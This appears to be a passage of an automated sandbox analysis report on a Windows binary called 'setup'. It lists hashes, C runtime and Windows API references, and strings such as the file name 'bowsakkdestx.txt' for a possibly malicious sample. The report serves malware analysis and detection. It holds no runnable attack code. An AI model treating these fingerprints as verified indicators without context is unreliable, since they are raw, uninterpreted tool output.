                • Opcode ID: 37c0a0619d1de68f8926526a4348b91c256fa9f986865ef3ae2ab210aec5a9ed
                • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                • Opcode Fuzzy Hash: 37c0a0619d1de68f8926526a4348b91c256fa9f986865ef3ae2ab210aec5a9ed
                • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                APIs
                • __getenv_helper_nolock.LIBCMT ref: 00441726
                • _strlen.LIBCMT ref: 00441734
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • _strnlen.LIBCMT ref: 004417BF
                • __lock.LIBCMT ref: 004417D0
                • __getenv_helper_nolock.LIBCMT ref: 004417DB
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                • String ID:
                • API String ID: 2168648987-0
                • Opcode ID: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
                • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                • Opcode Fuzzy Hash: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
                • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                APIs
                • _malloc.LIBCMT ref: 0043B70B
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                • _free.LIBCMT ref: 0043B71E
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                • API String ID: 1020059152-0
                • Opcode ID: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                • Opcode Fuzzy Hash: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                APIs
                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                • DispatchMessageW.USER32(?), ref: 0041F0B6
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                APIs
                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                • DispatchMessageW.USER32(?), ref: 0041E546
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                APIs
                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                • DispatchMessageW.USER32(?), ref: 0041FA7B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                APIs
                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                • DispatchMessageW.USER32(?), ref: 0041FE2B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 3e8e620cdafad959620aa8092266a2dd437b35ec9cc4a24f81571b5e96538b17
                • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                • Opcode Fuzzy Hash: 3e8e620cdafad959620aa8092266a2dd437b35ec9cc4a24f81571b5e96538b17
                • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __flsbuf__flush__getptd_noexit__write
                • String ID: A
                • API String ID: 3115901604-2078354741
                • Opcode ID: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                • Instruction ID: 74c924880168de559db59c14e1a2c39f6381d3f38157317aef41ba5f0430eaff
                • Opcode Fuzzy Hash: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                • Instruction Fuzzy Hash: F041F870700626BFDB289F69EA8056F77A5BF44360B94813FE805C7740D6F8DD818B58
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
                • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                • Opcode Fuzzy Hash: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
                • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\buffer\buffer.c$C7F
                • API String ID: 2102423945-2013712220
                • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                APIs
                • UuidCreate.RPCRT4(?), ref: 0040C5DA
                • UuidToStringA.RPCRT4(?,00000000), ref: 0040C5F6
                • RpcStringFreeA.RPCRT4(00000000), ref: 0040C640
                Strings
                • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: StringUuid$CreateFree
                • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                • API String ID: 3044360575-2335240114
                • Opcode ID: dc9514dc3cc728d26dfdc447613b7bcea16efd59eca3e38d4ff14dbb98031a68
                • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                • Opcode Fuzzy Hash: dc9514dc3cc728d26dfdc447613b7bcea16efd59eca3e38d4ff14dbb98031a68
                • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _wcscmp
                • String ID: ACP$OCP
                • API String ID: 856254489-711371036
                • Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                • Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
                • Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                • Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 29327785-2616962270
                • Opcode ID: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
                • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                • Opcode Fuzzy Hash: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
                • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                APIs
                • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                • RegisterClassExW.USER32(00000030), ref: 0041BA73
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ClassCursorLoadRegister
                • String ID: 0$LPCWSTRszWindowClass
                • API String ID: 1693014935-1496217519
                • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                • DeleteFileA.KERNEL32(?), ref: 0040C45B
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendDeleteFileFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 610490371-2616962270
                • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove_strtok
                • String ID:
                • API String ID: 3446180046-0
                • Opcode ID: 26ecba1af734d67abcddf069fb71295571f6332d11be29335550415d4ddae36b
                • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                • Opcode Fuzzy Hash: 26ecba1af734d67abcddf069fb71295571f6332d11be29335550415d4ddae36b
                • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                • __isleadbyte_l.LIBCMT ref: 0043C6DB
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C709
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C73F
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
                • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                • Opcode Fuzzy Hash: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
                • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                APIs
                • ___BuildCatchObject.LIBCMT ref: 004C70AB
                  • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                  • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                • CallCatchBlock.LIBCMT ref: 004C70F8
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                APIs
                  • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                  • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                • __calloc_crt.LIBCMT ref: 00425A01
                  • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                • __lock.LIBCMT ref: 00425A37
                • ___addlocaleref.LIBCMT ref: 00425A43
                • __lock.LIBCMT ref: 00425A57
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                • String ID:
                • API String ID: 2580527540-0
                • Opcode ID: c9003dd4814c68933c834b84c70668bb75b6b3040d6cd8926ff63fa93c3d8d3a
                • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                • Opcode Fuzzy Hash: c9003dd4814c68933c834b84c70668bb75b6b3040d6cd8926ff63fa93c3d8d3a
                • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                APIs
                • lstrlenW.KERNEL32 ref: 004127B9
                • _malloc.LIBCMT ref: 004127C3
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                • _memset.LIBCMT ref: 004127CE
                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
